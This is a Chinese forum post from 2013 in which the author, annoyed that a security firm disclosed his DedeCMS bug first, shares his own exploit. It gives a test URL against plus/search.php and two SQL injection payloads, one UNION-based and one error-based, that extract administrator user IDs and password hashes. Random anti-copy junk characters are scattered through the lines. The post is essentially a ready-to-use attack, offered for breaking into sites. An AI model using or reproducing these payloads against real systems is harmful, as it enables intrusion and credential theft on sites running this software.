转载不加作者名的没JJ
o, s" P, b& _7 M
: y# ~% h7 A( I: k: p6 N; v* F哎。没意识,我一个月前就发现了这个漏洞,一直也没去黑站 放那 现在狗卵的什么 知道创宇 发出来了。郁闷。。可惜了我的洞辛苦看了2天的dedecms漏洞就这样没了。
7 \, ]0 w; F G# Y# l, n: ^% B3 r: |# D; }' ]- ?6 U
既然已经发出来了,我就把我自己搞的exp发下吧。。唉。
2 T* \, D Y6 [! ~! E4 f5 ?+ n1 g' a z% n7 f
我一般是这样测试的:
q+ A2 b" a/ v( Q2 U0 s. U% o9 @2 U: j2 u* `/ F* _, T! l5 p
提交 xx.com/plus/search.php?keyword=as&typeArr[ uNion ]=a
8 {, `. n% U# e" A4 G8 s* I8 l. o8 O% Y$ s- a" a B, ] w# I
转载不加作者名的没JJ
9 r/ f5 I; B/ f
: U& T( U* c4 Z* H- K% T, F作者:鬼哥6 N- ~8 X$ Z6 `1 I: r( k! b* W q
1 D% H9 I" ^% O: j
: S# }. t! Z$ `+ l- F8 L
- {, G; f0 ^* p9 s, @看结果如果提示1 l# J1 N, F# X3 j
, x8 | Q8 j# U/ RSafe Alert: Request Error step 2 !
% w2 V$ T/ @+ ~3 B. W. Y% N$ @: Y. \& q7 b$ {3 L( z: Q
那么直接用下面的exp
1 ?! O7 r# v. G8 V$ v( }. Z4 m4 ]
2 E9 {1 V& h2 q, y+ R4 J: {xx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+UnIon+seleCt+1,2,3,4,5,6,7,8,9,10,userid,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,pwd,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42+from+`%23@__admin`%23@`\'`+]=a& j- V/ x/ X( {/ F% M& O h/ E
" B; ~: u: i( R3 B( V3 M7 f6 Y5 e( {9 `( F5 v6 _
看结果如果提示
x9 a9 [# f& w8 \7 y2 i: s( d4 H* B3 `# P. A$ Q6 c
Safe Alert: Request Error step 1 !
m; u& P# o: R2 ~4 g& E! f$ r j( x0 w. e0 ~. v/ `; J
那么直接用下面的exp
1 y2 h* N' g, Z% {/ x) F. r+ f. [
! Q1 S! d& _* qxx.com/plus/search.php?keyword=as&typeArr[111%3D@`\'`)+and+(SELECT+1+FROM+(select+count(*),concat(floor(rand(0)*2),(substring((select+CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`+limit+0,1),1,62)))a+from+information_schema.tables+group+by+a)b)%23@`\'`+]=a* {: A2 t% V- B6 A& s( u
9 y3 p) g8 b4 t8 A% T P% r2 f4 h7 A6 P
; R/ q- g& K8 I6 p如果正常显示证明漏洞不存在了。, _* z$ ^: \* ~: S
- b! E8 ^& t2 z5 ?: {: q" [转载不加作者名的没JJ |
发表于 2013-1-21 08:45:22
收藏
支持
反对